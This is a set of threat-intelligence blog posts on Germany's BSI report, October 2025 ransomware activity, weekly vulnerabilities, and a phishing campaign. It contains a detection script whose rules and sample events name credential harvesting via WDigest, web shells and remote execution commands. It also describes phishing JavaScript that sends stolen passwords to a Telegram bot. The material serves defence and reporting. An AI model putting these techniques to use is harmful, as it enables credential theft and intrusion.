Germany Urges Attack Surface Management Adoption as Routinely as Antivirus Protection
https://cyble.com/blog/germany-expanding-threat-landscape-sme-cyber-risks/ (Cyble, Fri, 14 Nov 2025)

The Federal Office for Information Security (BSI) released its 2025 report on the state of IT security in Germany, and the verdict is unequivocal: there is no all-clear. Despite notable law enforcement successes against major cybercrime groups, Germany's IT security situation remains "tense." The culprit? Inadequately protected attack surfaces that continue to provide easy entry points for threat actors, BSI noted. 

For the first time, the BSI's findings state that while threats have somewhat stabilized, poorly managed attack surfaces are keeping risk levels dangerously high. Most concerning is that 80% of reported attacks now target small and medium-sized enterprises (SMEs)—organizations that often lack the resources and expertise to defend themselves effectively. 

Statistical Snapshot 

Threats 

  • Positive developments: International law enforcement operations disrupted major cybercrime groups like LockBit and Alphv, greatly reducing their activity. 

  • Botnets: BadBox and Vo1d were the most active globally. The BSI participated in takedown operations through sinkholing measures. 

  • Phishing and malware: Over 800 malicious websites per day were detected, though their average lifespan decreased to under two hours, showing faster countermeasures. 

Attack Surface 

  • Web-based vulnerabilities remained alarming, with 119 new software vulnerabilities identified daily (+24% year-over-year). 

  • Many public-facing systems remained unpatched, posing risk. 

  • Germany had 13.2 million reachable [.]de domains, with 47 million vulnerable server services detected. 

  • The report urges organizations to adopt attack surface management as routinely as antivirus protection. 

Attacks 

  • Cyber espionage: Government institutions were the main target of APTs. 

  • Ransomware: Around 950 reported cases, with 72% involving data leaks. 

  • Exploitation attacks increased 38% from the prior year. 

  • 80% of reported cyberattacks targeted small and medium-sized enterprises (SMEs) due to limited resources and cybersecurity know-how. 

  • Critical infrastructure (energy, transport, healthcare, finance) reported dozens of cyber incidents. 

Impact 

  • Data leaks surged to 461 incidents involving German institutions. 

    Leaked data included: 

      • Birth data (92%) 

      • Physical addresses (72%) 

      • Email addresses (63%) 

      • Passwords, financial, and health information 

  • Ransom payments decreased in frequency, but the average ransom amount reached an all-time high. 

  • IoT devices (like Android smart gadgets) became a growing infection source—many shipped already compromised. 

  • 30,000 BadBox-infected and 10,000 Vo1d-infected devices were mitigated via BSI coordination. 

Resilience 

The BSI enhanced its monitoring and certification: 

  • 413 Common Criteria certificates issued (105 new in 2025). 

  • 8,622 organizations joined the Alliance for Cyber Security. 

Incident management maturity (KRITIS operators): 

  • ISMS maturity is mostly at levels 3–4. 

  • BCMS maturity is improving. 

Public awareness remains mixed: 

  • Citizens know on average 6.1 protection measures, but use only 3.8. 

  • Many find measures "too complicated". 

  • Common protections: strong passwords, 2FA, password managers. 

  • The BSI’s service center handled ~10,500 citizen inquiries on cybersecurity in 2025. 

The Numbers Tell a Sobering Story 

Germany's web attack surface in Q2 2025 comprised approximately 13.2 million [.]de domains accessible from the internet. Of these, 8.1 million domains were reachable via both IPv4 and IPv6, while 5.1 million were accessible only through IPv4. This massive digital footprint represents an enormous challenge for security teams trying to maintain visibility and control. 

The vulnerability landscape has intensified significantly. An average of 119 new vulnerabilities in IT systems were discovered daily during the reporting period—a 24% increase compared to the previous year. This relentless pace of vulnerability disclosure, driven partly by changed reporting policies but also by the growing complexity of software systems, means that organizations face an ever-expanding list of potential weaknesses to address. 

Meanwhile, exploitation attempts have surged. The BSI's MADCAT honeypot measurements showed a 38% increase in exploitation attacks compared to the previous reporting period. Attackers aren't just probing systems—they're actively exploiting weaknesses at an accelerating rate. 

The Cybercrime Landscape in Germany: Stabilization Without Relief 

The threat landscape showed some positive developments during the reporting period. International law enforcement actions against major ransomware operations led to a degree of stabilization. LockBit and AlphV, two previously dominant ransomware groups, were substantially disrupted. This represents a significant victory for coordinated international cybercrime enforcement. 

However, stabilization doesn't mean elimination. Germany ranked third globally among cybercrime group targets at 64%, behind only the United States (94%) and the United Kingdom (71%). The cybercrime ecosystem has proven remarkably resilient, with new groups emerging to fill the void left by disrupted operations. RansomHub, Clop, Akira, Qilin, and Play were among the most active groups during the reporting period, continuing the trend of Ransomware-as-a-Service that makes sophisticated attacks accessible to less skilled criminals. 

The data leak situation has reached alarming levels. During the reporting period, 461 data leaks affected German institutions and consumers. The most commonly compromised information included birth dates (92% of leaks), physical addresses (72%), and email addresses (63%). More sensitive data, such as passwords (36%), payment information (22%), and health data (18%) were also frequently exposed. 

The IoT Botnet Threat 

Perhaps one of the most disturbing revelations in the BSI report concerns IoT botnets, particularly BadBox and Vo1d. BadBox became the largest active botnet in Germany, with up to 58% of infected systems in the country attributed to this single operation. What makes BadBox especially concerning is that devices were infected during the production phase—before they ever reached consumers. 

This represents a fundamental shift in the threat model. Traditional security advice assumes that devices are secure when purchased and become compromised through user behavior or software vulnerabilities. BadBox demonstrates that supply chain compromises can deliver pre-compromised devices directly to consumers and businesses, who have no practical way to detect the infection. 

The BSI responded through sinkholing operations, redirecting communication attempts from infected devices to BSI-controlled servers to prevent further malicious activity. Approximately 30,000 BadBox-infected IoT systems had their communications blocked, and device owners were notified. An additional 10,000 Vo1d-infected device owners received similar notifications. While these remediation efforts represent important defensive actions, they're reactive measures addressing infections that have already occurred. 

The SME Vulnerability Gap 

The statistic that should alarm every business leader in Germany: approximately 80% of reported attacks targeted SMEs. This isn't a random distribution—it's a deliberate strategic shift by attackers toward softer targets. 

The dynamics are straightforward. Large enterprises have dedicated security teams, substantial budgets, and often sophisticated detection and response capabilities. Attacking them requires significant resources and expertise, with no guarantee of success. SMEs, conversely, often operate with limited IT staff, minimal security budgets, and gaps in both technical controls and security awareness. For cybercriminals conducting cost-benefit analyses, SMEs represent the optimal target: easier to compromise, less likely to detect attacks quickly, and numerous enough to provide a steady stream of victims. 

The attack pattern reflects this calculation. Rather than pursuing complex, targeted attacks against well-defended enterprises, threat actors increasingly favor volume-based approaches, hitting many SMEs with relatively simple techniques. Ransomware attacks have become particularly effective against this segment, with 72% of the 950 reported ransomware incidents involving data leaks used to pressure victims into paying. 

Interestingly, while ransom payment rates continued their multi-year decline—dropping to just 26% in Q2 2025 compared to 85% in Q1 2019—the average ransom payment reached all-time highs. This suggests that while fewer victims are paying, those who do pay are facing substantially larger demands, particularly when data leakage is involved. 

Attack Surface Management: The Missing Link 

The BSI's conclusion is direct and unambiguous: "Protection of attack surfaces is the decisive lever for improving cybersecurity in 2026." This isn't merely one recommendation among many—it's identified as the critical factor that will determine whether Germany's cybersecurity situation improves or continues to deteriorate. 

The data support this assessment. Of the accessible IP addresses in Q2 2025, approximately 791,722 showed exposed metadata—potential indicators of security weaknesses. Far too often, known vulnerabilities in perimeter systems are patched too late or not at all. Web attack surfaces, in particular, show a "worrying state" that requires more professional attention through effective attack surface management. 

The federal administration provides a microcosm of the challenge. An average of 684,000 active email addresses existed in federal networks daily, along with approximately 1,480 active social media accounts (with high numbers of unreported cases due to private employee accounts). Daily accessible IP addresses of the federal administration with suspected vulnerabilities ranged from zero to over 300 depending on severity level. Even well-resourced government agencies struggle to maintain complete visibility and control over their attack surfaces. 

The BSI argues that attack surface management must become as routine as antivirus software for email. This represents a fundamental shift in thinking—from treating attack surface visibility as an occasional audit activity to recognizing it as a continuous operational necessity. 

The Resilience Gap 

Germany has made substantial investments in cybersecurity awareness and capability building. The Alliance for Cyber Security has grown to include 8,622 companies and institutions. The BSI issued 41 cybersecurity warnings during the reporting period and provided 3,871 reports through its Warning and Information Service. Critical infrastructure operators continue to make progress in implementing Information Security Management Systems (ISMS) and Business Continuity Management Systems (BCMS), with maturity levels steadily improving. 

Yet awareness hasn't translated to sufficient action, particularly among vulnerable groups. Consumer surveys revealed a troubling gap: respondents knew an average of 6.1 protection measures but actually used only 3.8. Both awareness and usage of protection measures declined in 2025. Many respondents cited finding the measures too complicated, suggesting that even when people know what to do, friction in implementation prevents effective security practices. 

The federal administration saw some positive trends, with daily malware attacks via email declining slightly from 772 to 753. However, blocked access attempts to malicious websites increased by 23%, from 9,212 to 11,330 daily attempts. The threat isn't decreasing—it's shifting to channels where defenses may be less mature. 

From Awareness to Protection 

The BSI report makes clear that incremental improvements won't suffice. Every organization—regardless of size—must treat attack surface analysis and management as indispensable components of effective risk management. This requires several shifts in thinking and practice: 

First, organizations must move from periodic security assessments to continuous monitoring. Attack surfaces change too rapidly for annual or quarterly reviews to provide meaningful protection. What was secure yesterday may be vulnerable today. 

Second, vulnerability management must evolve from attempting comprehensive patching to intelligent prioritization. With 119 new vulnerabilities discovered daily, teams must focus on vulnerabilities that pose actual risk to their specific environments—those being actively exploited, affecting internet-facing systems, or for which exploit code exists in underground markets. 

Third, SMEs must receive targeted support. Expecting resource-constrained small businesses to independently develop sophisticated security programs isn't realistic. Industry associations, government agencies, and technology providers must collaborate on solutions that are accessible, affordable, and appropriately scaled for SME needs. 

Fourth, supply chain security must extend beyond vendor questionnaires to continuous monitoring of partner security postures. The question isn't whether a vendor had good security six months ago—it's whether they're secure right now. 

Building Proactive Defenses in a Tense Environment 

The BSI characterizes Germany's IT security situation as "tense," and the data justifies this assessment. Threats have stabilized at high levels rather than diminishing. Attack surfaces continue expanding faster than organizations can secure them. Risks remain elevated because too many vulnerabilities go unaddressed. Damage effects, measured in data leaks and financial costs, show no signs of declining. 

Yet the report also demonstrates that focused efforts produce measurable results. Law enforcement actions disrupted major cybercrime groups. Sinkholing operations neutralized tens of thousands of botnet infections. Critical infrastructure operators improved their security management maturity. These successes prove that the situation, while tense, isn't hopeless. 

What's needed is a fundamental reorientation toward proactive attack surface management. Organizations that understand what attackers see, prioritize vulnerabilities that matter, and maintain continuous visibility over their digital footprint will significantly reduce their risk exposure. Those that don't will remain attractive targets in an increasingly hostile threat landscape. 

The BSI's message is clear. Protect attack surfaces now, or accept increasing risk. For Germany's businesses—particularly the SMEs absorbing 80% of attacks—this isn't a theoretical concern. It's an operational imperative that will determine which organizations thrive and which become the next breach statistics in next year's report. 

Taking Action on Attack Surface Management 

The challenges identified in Germany's BSI report aren't unique to German organizations—they're indicative of global trends affecting businesses worldwide. Expanding attack surfaces, persistent threats, and vulnerability management at scale are universal challenges requiring comprehensive visibility and continuous monitoring. 

Cyble's threat intelligence platform addresses these core challenges through integrated attack surface management, real-time vulnerability intelligence, and dark web monitoring. Organizations gain visibility into their exposed assets, prioritize vulnerabilities based on active exploitation, and receive early warnings about threats emerging in underground forums—the same capabilities the BSI report identifies as critical for improving cybersecurity posture.  

For organizations looking to move from reactive security to proactive AI-driven attack surface protection, request a demo to explore how comprehensive threat intelligence can strengthen your defenses. 


October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield
https://cyble.com/blog/ransomware-attacks-surge-october-2025/ (Cyble, Thu, 13 Nov 2025)

Ransomware attacks soared to the second-highest total on record in October 2025. 

October’s 623 ransomware attacks were up more than 30% from September, and below only February 2025’s record totals (chart below). It was the sixth consecutive monthly increase in ransomware attacks. 

Qilin was the most active ransomware group for the sixth time in the last seven months, its 210 claimed victims three times the total of second-place Akira (chart below). Also of note is the third-place showing of Sinobi with 69 victims claimed, a rapid ascendance for a group that first emerged in July 2025. We include high-confidence Qilin indicators of compromise (IoCs) from October 2025 in an appendix below. 

Construction, Professional Services, Healthcare, Manufacturing, IT and Energy/Utilities were the most attacked sectors (chart below). 

In October, 31 incidents potentially impacted critical infrastructure, and 26 incidents had possible supply chain implications. 

The U.S. was by far the most attacked country once again, its 361 attacks 10 times more than second-place Canada (chart below). Of concern is the emergence of Australia as a top-five target, as the country's natural resource wealth and high per-capita GDP make it an attractive target for threat actors. 

Year-to-date, ransomware attacks are up 50% from the first 10 months of 2024 to 5,194 ransomware attacks through October 31, as new leaders like Qilin, Sinobi, and The Gentlemen have more than made up for the decline of former leaders such as LockBit and RansomHub. 

Vulnerabilities Weaponized by Ransomware Groups in October 

Fueling the increase in both ransomware and supply chain attacks this year has been a steady supply of critical IT vulnerabilities, as well as a large number of unpatched internet-facing assets. Among the vulnerabilities targeted in October were: 

  • Oracle E-Business Suite remote SSRF/XSL RCE (CVE-2025-61882) – targeted by Cl0p 

  • GoAnywhere MFT deserialization RCE (CVE-2025-10035) – Medusa 

  • Microsoft Windows Privilege Escalation Vulnerability (CVE-2021-43226) – Unknown ransomware groups (CISA advisory) 

  • Velociraptor Incorrect Default Permissions (CVE-2025-6264) – Warlock ransomware operators 

  • Linux kernel netfilter nf_tables module (CVE-2024-1086) – Unknown ransomware groups (CISA advisory) 

Ransomware Attacks and Key Developments 

Below are some of the most important ransomware developments in October 2025, culled from Cyble and OSINT sources. 

The Cl0p ransomware group exploited a critical vulnerability (CVE-2025-61882) in Oracle E-Business Suite versions 12.2.3–12.2.14 to achieve remote code execution (RCE) via a server-side request forgery (SSRF) that forces the application to fetch and execute a malicious XSL payload. The group sent extortion emails and appears to be leveraging this exploit as an entry point for data theft and ransomware deployment. 

Medusa ransomware chained an unauthenticated deserialization RCE in GoAnywhere MFT (CVE-2025-10035) to gain initial access, then maintained persistence and remote control by abusing RMM tooling (SimpleHelp and MeshAgent), dropping RMM binaries directly under the GoAnywhere process and creating .jsp web shells in MFT directories. They performed user/system discovery and network scans (e.g., netscan), moved laterally using mstsc.exe (RDP), and used the RMM infrastructure (plus a Cloudflare tunnel) for command and control (C2). Data theft was performed with Rclone in at least one incident, and Medusa ransomware was later deployed in at least one confirmed environment. 

Ransomware operators are increasingly hijacking or silently installing legitimate remote access tools (AnyDesk, RustDesk, Splashtop, TightVNC, etc.) after credential compromise to gain persistent, stealthy access, using these trusted channels for file transfer, interactive control, antivirus neutralization, and ransomware delivery. Attack paths include credential theft/brute force, modifying existing tool configs or using silent install flags, escalating to SYSTEM, disabling defenses, and propagating the tools to support lateral movement and final encryption. 

Warlock operators installed an outdated version of the open-source Velociraptor on multiple servers to establish stealthy persistence and remote control, then used it alongside a pre-existing vulnerability (CVE-2025-6264) and GPO modifications to disable defenses. They later deployed Warlock, LockBit and Babuk ransomware variants within the same engagement, while also exfiltrating data and encrypting virtual machine environments. 

Recent BlackSuit campaigns employed vishing to steal VPN credentials for initial access and performed DCSync on a domain controller for high-privilege credentials. In addition, the group deployed AnyDesk and a custom RAT for persistence. Other measures included wiping forensic traces with CCleaner, and using Ansible to deploy BlackSuit ransomware across ESXi hosts, encrypting hundreds of VMs and causing major operational disruption. 

The threat actor Vanilla Tempest conducted a campaign that distributed fake Microsoft Teams installers hosted on look-alike domains. The installers used fraudulently signed certificates, delivering the Oyster backdoor and ultimately Rhysida ransomware. Microsoft disrupted the operation in early October by revoking more than 200 certificates. 

Qilin affiliates deployed a Linux-based ransomware binary on Windows machines by abusing legitimate remote-management tools (WinSCP, Splashtop, AnyDesk, ScreenConnect) and leveraging BYOVD (Bring Your Own Vulnerable Driver) attacks. In addition, other affiliates used a staged toolkit (SharpDecryptPwd, Mimikatz, NirSoft utilities) plus a WDigest registry tweak to harvest credentials, and exfiltrate data via abused cloud tools like Cyberduck (multipart uploads to Backblaze). 

Trigona ransomware operators brute-forced exposed MS-SQL servers, embedding malware inside database tables and exporting it to disk via bcp.exe to install payloads (e.g., AnyDesk, Teramind). The actor also deployed Rust-based RDP/MS-SQL scanners, a Go SQL-injection tester (“StressTester”), and custom delete/replace binaries—an automated, SQL-centric intrusion chain that weaponizes legitimate DB tooling for initial access and payload delivery. 

On October 9, DragonForce posted on the RAMP forum that it is opening its partner program to the public. New affiliates can register and immediately access a suite of free “partner services,” including professional file analysis/audit, hash decryption, call support, and free victim storage. Registration requires a $500 non-refundable fee; payments accepted in XMR and BTC. The group warned affiliates to follow its rules or face account blocking or free decryptor distribution. 

On October 18, threat actor Zeta88 — alleged operator of The Gentlemen ransomware — announced on RAMP updates to their Windows, Linux and ESXi lockers, adding automatic self-restart and run-on-boot, a silent mode for Windows that encrypts without renaming files and preserves timestamps, and self-spread capabilities across networks/domains using WMI/WMIC, SCHTASKS, SC (Service Control) and PowerShell Remoting. The release also introduced flexible encryption-speed modes, multiple Windows operating modes, and a universal decryptor covering all operating modes. 
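As an added illustration (not code from Cyble or from the reports cited in this section), the following Python rules flag four of the behaviours described above over constructed endpoint telemetry: an RMM agent launched directly under the GoAnywhere process and a .jsp file written into its install tree (the Medusa chain), the WDigest UseLogonCredential change used for credential harvesting (the Qilin toolkit), and WMIC, SCHTASKS, SC or PowerShell Remoting invoked against a remote host (The Gentlemen's self-spread). Event field names, file paths, host names and command lines are assumptions made for the example.

```python
"""Rule-based detection over endpoint telemetry for the ransomware tradecraft
described in this section. Events are constructed for the example and loosely
follow Sysmon process/file/registry records; field names are assumptions."""
import re
from typing import Dict, List

# Remote-access tools the report names as abused by ransomware operators.
RMM_TOOLS = ("simplehelp", "meshagent", "anydesk", "rustdesk", "splashtop",
             "tightvnc", "screenconnect", "teramind")
# Native binaries used for self-spread, with the switch that names a remote host.
REMOTE_SWITCH = {
    "wmic.exe": r"/node:",          # wmic /node:<host> ...
    "schtasks.exe": r"\s/s\s+\S",   # schtasks ... /s <host>
    "sc.exe": r"\\\\[\w.-]+",       # sc \\<host> ...
}
# Registry path (without hive prefix) whose UseLogonCredential=1 re-enables
# plaintext credential caching in LSASS.
WDIGEST_KEY = r"control\securityproviders\wdigest"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _alert(rule: str, ev: Dict, detail: str) -> Dict:
    return {"rule": rule, "host": ev["host"], "detail": detail}


def detect(events: List[Dict]) -> List[Dict]:
    """Run every rule over the event stream and return alerts in event order."""
    alerts: List[Dict] = []
    for ev in events:
        kind = ev["event"]
        if kind == "process_create":
            image = ev["image"].lower()
            parent = ev.get("parent_image", "").lower()
            cmd = ev.get("cmdline", "")
            # Rule 1: RMM agent spawned directly by the MFT service (Medusa pattern).
            if "goanywhere" in parent and any(t in basename(image) for t in RMM_TOOLS):
                alerts.append(_alert("rmm_spawned_by_mft", ev,
                                     f"{basename(parent)} -> {basename(image)}"))
            # Rule 2: WMIC / SCHTASKS / SC pointed at another host (self-spread pattern).
            pattern = REMOTE_SWITCH.get(basename(image))
            if pattern and re.search(pattern, cmd, re.IGNORECASE):
                alerts.append(_alert("remote_exec_native_tool", ev, cmd))
            # Rule 3: PowerShell Remoting against a named computer.
            if basename(image) == "powershell.exe" and re.search(
                    r"invoke-command\b.*-computername\s+\S", cmd, re.IGNORECASE):
                alerts.append(_alert("remote_exec_psremoting", ev, cmd))
        elif kind == "file_create":
            path = ev["path"].replace("/", "\\").lower()
            # Rule 4: JSP dropped inside the MFT install tree (web-shell pattern).
            if path.endswith(".jsp") and "\\goanywhere\\" in path:
                alerts.append(_alert("jsp_in_mft_dir", ev, ev["path"]))
        elif kind == "registry_set":
            key = ev["key"].replace("/", "\\").lower()
            # Rule 5: WDigest told to keep plaintext credentials in memory.
            if (key.endswith(WDIGEST_KEY)
                    and ev["value"].lower() == "uselogoncredential"
                    and str(ev["data"]).strip() in ("1", "0x1")):
                alerts.append(_alert("wdigest_plaintext_creds", ev,
                                     f"{ev['value']}={ev['data']}"))
    return alerts


# Constructed telemetry; hosts, paths and command lines are illustrative only.
SAMPLE_EVENTS = [
    {"host": "mft01", "event": "process_create",
     "parent_image": r"C:\Program Files\GoAnywhere\jre\bin\java.exe",
     "image": r"C:\Windows\Temp\meshagent.exe", "cmdline": "meshagent.exe -install"},
    {"host": "mft01", "event": "file_create",
     "path": r"C:\Program Files\GoAnywhere\webapps\ROOT\upload.jsp"},
    {"host": "mft01", "event": "file_create",
     "path": r"C:\Program Files\GoAnywhere\logs\goanywhere.log"},      # benign
    {"host": "ws07", "event": "registry_set",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "value": "UseLogonCredential", "data": 1},
    {"host": "ws07", "event": "process_create",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /s SRV02 /tn upd /tr C:\Temp\update.exe /sc onstart"},
    {"host": "ws07", "event": "process_create",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"Invoke-Command -ComputerName SRV04 "
                "-ScriptBlock { Start-Process C:\\Temp\\update.exe }\""},
    {"host": "ws07", "event": "process_create",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\sc.exe", "cmdline": "sc query wuauserv"},  # benign
]


def run_sample() -> List[Dict]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a['host']:6} {a['rule']:26} {a['detail']}")
```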

Conclusion 

The alarming increase in ransomware attacks in October – and the continual investment in upgrades and innovations by ransomware groups – highlights the need for security teams to respond with equal vigilance. Basic cybersecurity best practices that can help protect against a wide range of cyber threats include: 

  • Prioritizing vulnerabilities based on risk. 

  • Protecting web-facing assets. 

  • Segmenting networks and critical assets. 

  • Hardening endpoints and infrastructure. 

  • Strong access controls, allowing no more access than is required, with frequent verification. 

  • A strong source of user identity and authentication, including multi-factor authentication and biometrics, as well as machine authentication with device compliance and health checks. 

  • Encryption of data at rest and in transit. 

  • Ransomware-resistant backups that are immutable, air-gapped, and isolated as much as possible. 

  • Honeypots that lure attackers to fake assets for early breach detection. 

  • Proper configuration of APIs and cloud service connections. 

  • Monitoring for unusual and anomalous activity with SIEM, Active Directory monitoring, endpoint security, and data loss prevention (DLP) tools. 

  • Routinely assessing and confirming controls through audits, vulnerability scanning, and penetration tests. 

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. 

Appendix: IoCs Associated with Qilin Ransomware Group, October 2025 


The Week in Vulnerabilities: From IT Systems to Airport Weather Monitoring
https://cyble.com/blog/cyble-weekly-vulnerability-report-november-2025/ (Cyble, Mon, 10 Nov 2025)

Cyble vulnerability intelligence researchers tracked 905 vulnerabilities in the last week, and more than 30 already have a publicly available Proof-of-Concept (PoC), significantly increasing the likelihood that those vulnerabilities may face real-world attacks. 

A total of 54 vulnerabilities were rated as critical under the CVSS v3.1 scoring system, while 35 received a critical severity rating based on the newer CVSS v4.0 scoring system. 

Here are some of the IT and ICS vulnerabilities flagged by Cyble threat intelligence researchers as meriting high-priority attention by security teams, including vulnerabilities under discussion by threat actors and three 10.0-severity vulnerabilities in airport weather systems. 

The Week’s Top IT Vulnerabilities 

CVE-2025-12531 is a critical Improper Restriction of XML External Entity Reference vulnerability in IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6, which a remote attacker could exploit to expose sensitive information or consume memory resources. 

CVE-2025-34294 is a high-severity Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Wazuh's File Integrity Monitoring (FIM). When configured with automatic threat removal, Wazuh contains a TOCTOU race condition that could potentially be exploited for SYSTEM-level arbitrary file or folder deletion and local privilege escalation. 

CVE-2025-12599 is a 10.0-severity cryptographic vulnerability related to the use of hard-coded cryptographic keys in Azure Access Technology's BLU-IC2 and BLU-IC4 devices through 1.19.5. 

CVE-2025-48703 is a critical remote code execution vulnerability in CentOS Web Panel (CWP) that could potentially allow an unauthenticated attacker who knows a valid non-root username to execute arbitrary commands on the server. The vulnerability has a high impact and is actively exploited, affecting over 200,000 servers worldwide. It was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog this week. 

CVE-2025-41244 is a high-severity local privilege escalation zero-day vulnerability in VMware Tools and VMware Aria Operations that was also added to the CISA KEV catalog this week. A malicious local actor with non-administrative privileges and access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled could potentially escalate privileges to root on the same VM. 

CVE-2025-59287 continues to generate discussion by security researchers and threat actors, and Cyble honeypot sensors have detected attack attempts on the critical remote code execution vulnerability in Microsoft's Windows Server Update Services (WSUS). Remote unauthenticated attackers could potentially execute arbitrary code with SYSTEM privileges by exploiting unsafe deserialization of AuthorizationCookie objects. 

CVE-2023-20198 is attracting renewed attention because of an Australian Signals Directorate warning that threat actors are targeting unpatched Cisco devices. The critical vulnerability in the web UI of Cisco IOS XE software could allow a remote, unauthenticated attacker to create an account on the device and gain full administrator privileges, effectively taking full control of the system. The vulnerability affects a large number of internet-exposed Cisco devices. 

Vulnerabilities Discussed on Underground Forums 

Cyble dark web researchers observed several threat actors discussing weaponizing vulnerabilities on cybercrime and underground forums. Vulnerability exploits under discussion include: 

CVE-2025-64095: A critical vulnerability affecting DNN (formerly DotNetNuke), an open-source web content management platform in the Microsoft ecosystem. The flaw exists in the default HTML editor provider in versions prior to 10.1.1. It could allow unauthenticated users to upload files and overwrite existing files without authorization or validation. This can lead to website defacement and potentially enable the injection of cross-site scripting (XSS) payloads when combined with other vulnerabilities. 

CVE-2025-52665: A critical security vulnerability affecting Ubiquiti Inc.'s UniFi Access Application versions 3.3.22 through 3.4.31. The flaw arises from a misconfiguration that exposes a management API without proper authentication, potentially allowing a malicious actor with access to the management network to exploit it. The flaw could enable unauthenticated remote code execution (RCE), potentially allowing attackers to manipulate door access controls, retrieve sensitive information, or gain full control over affected devices. The vulnerability impacts the confidentiality, integrity, and availability of physical access control systems. 

CVE-2025-50168: A high-severity type confusion vulnerability in the Windows Win32K - ICOMP component. This vulnerability could allow an authorized attacker with local access and low privileges to escalate their privileges by causing the system to access a resource using an incompatible type. The flaw lies in the improper validation of user-supplied data, leading to this type of confusion condition. 

CVE-2024-38077: A critical vulnerability found in the Windows Remote Desktop Licensing Service, which poses a significant risk by potentially allowing remote code execution (RCE) on multiple affected Windows Server systems. 

CVE-2025-6440: A critical vulnerability in the WooCommerce Designer Pro plugin for WordPress, specifically affecting all versions up to and including 1.9.26. This flaw could allow unauthenticated attackers to upload arbitrary files, including executable scripts, to a website’s server, potentially leading to remote code execution and full site compromise. 

ICS Vulnerabilities 

Cyble researchers also highlighted critical industrial control system (ICS) vulnerabilities in Survision and Radiometrics products. 

Radiometrics VizAir Versions prior to 08/2025 are affected by three 10.0-severity vulnerabilities (CVE-2025-61945, CVE-2025-54863 and CVE-2025-61956). The Insufficiently Protected Credentials and Missing Authentication for Critical Function vulnerabilities could allow attackers to manipulate critical weather parameters and runway settings, mislead air traffic control and pilots, extract sensitive meteorological data, and cause significant disruption to airport operations, leading to hazardous flight conditions. 

CVE-2025-12108 is a critical Missing Authentication for Critical Function vulnerability affecting Survision License Plate Recognition LPR Camera. Successful exploitation of the vulnerability could allow an attacker to execute arbitrary code.  

Conclusion 

The wide range of vulnerable cyber and physical systems covered in this week’s report highlights the vast challenges confronting security teams, who must be able to respond with rapid, well-targeted actions to successfully defend IT and critical infrastructure. A risk-based vulnerability management program should be at the heart of those defensive efforts.  

Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans.  

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks.

Stay ahead of threats with Cyble’s Attack Surface Management

Schedule a Personalized Demo and see how Cyble helps you defend smarter. 

The post The Week in Vulnerabilities: From IT Systems to Airport Weather Monitoring appeared first on Cyble.

Multi-Brand themed Phishing Campaign Harvests Credentials via Telegram Bot API https://cyble.com/blog/multi-brand-phishing-campaign-harvests-credentials/ Mon, 10 Nov 2025 05:52:38 +0000 https://cyble.com/?p=104628 Phishing Credential Theft

Cyble Research and Intelligence Labs (CRIL) have uncovered a widespread phishing campaign targeting multiple brands to steal credentials. Attackers distribute HTML attachments through email, successfully bypassing conventional security checks by not using suspicious URLs or hosting on external servers. The embedded HTML files run JavaScript that steals user credentials and sends them directly to attacker-controlled Telegram bots.

The infection chain, outlined in Figure 1, showcases the stages of the attack.

Figure 1: Campaign Overview

Technical findings

In this campaign, the adversary used an HTML file in the email as an attachment (RFC-compliant filename, such as RFQ_4460-INQUIRY.HTML) or as an archive. The HTML contains embedded JavaScript that accepts credentials on a fake Adobe login UI and posts them to the Telegram Bot API using a bot token and chat ID.

The social lure is a standard procurement/advice flow: an unsolicited request for quotation (RFQ) or invoice that asks the recipient to open the attached document and "sign in to view" (see Figure 2).

Figure 2: Email Sharing Quotation PDF as an attachment, which is an HTML file

The malicious file is a self-contained HTML page. It loads a blurred background invoice image and renders a centered login modal. No external hosting is required for the initial file; the HTML itself is the attachment (see Figure 3).

Figure 3: Adobe Themed login request with blurred image as background

Credential capture flow:

  • The victim opens the HTML attachment either in a web browser or in a PDF viewer capable of rendering HTML (some email clients enable opening attachments in a browser sandbox).
  • The page shows a simulated Adobe sign-in form featuring email and password fields.
  • On form submission, the page executes JavaScript that reads the field values and constructs a message payload.
  • The script performs an HTTP POST to https://api.telegram.org/bot<BotToken>/sendMessage with chat_id and text fields containing the harvested credentials.
  • The script then displays an error or "invalid login" message to avoid suspicion and prevent the user from attempting to log in again immediately.

An excerpt of the exfiltration activity is shown in Figure 4.

Figure 4: Telegram Bot Exfiltration Function

Infrastructure

Harvested credentials are transmitted directly to Telegram via the Bot API using hard-coded bot tokens and chat IDs embedded in the JavaScript of multiple samples.

We analysed two representative samples, which reveal the campaign's technical sophistication:

Sample 1

  • Implements CryptoJS AES encryption for obfuscation (key: 8525965283890, iv: 4842043763)
  • Harvests Email Address and Password, captures IP Address and user-agent, followed by exfiltration to Telegram
  • Uses a dual-capture mechanism, forcing the victim to enter the password twice by flashing a "wrong credentials entered" pop-up
  • Integrates jQuery and external IP services (api.ipify.org, http://ip-api.com) to capture the victim's IP address
  • Redirects to legitimate adobe.com after harvesting the credentials

Sample 2

  • Uses the native Fetch API for a cleaner implementation
  • Displays "The login is invalid" to force the victims to make multiple credential input attempts
